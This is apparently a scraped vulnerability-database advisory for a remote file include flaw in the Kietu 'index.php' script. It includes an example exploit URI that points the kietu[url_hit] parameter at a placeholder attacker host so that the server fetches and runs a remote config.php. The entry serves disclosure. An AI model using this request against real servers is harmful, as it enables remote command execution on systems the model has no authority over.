Vendor: index.php
By: SecurityFocus
CVSS: 7.5 (HIGH)
Remote File Include Vulnerability
CWE: 98
Product Name: index.php
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

Kietu ‘index.php’ Remote File Include Vulnerability

A flaw exists in the Kietu 'index.php' script that may permit remote attackers to include malicious remote files. Remote users may influence the include path for the 'config.php' configuration file, which may result in execution of arbitrary commands with the privileges of the webserver process.

Issuing the following URI request to the vulnerable server results in execution of the remote attacker's PHP script:

http://www.example.com/index.php?kietu[url_hit]=http://[attacker]/

where the 'config.php' file must exist at:

http://[attacker]/config.php

Mitigation:

Ensure that the include path is properly configured and that the application is not vulnerable to remote file inclusion.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9499/info
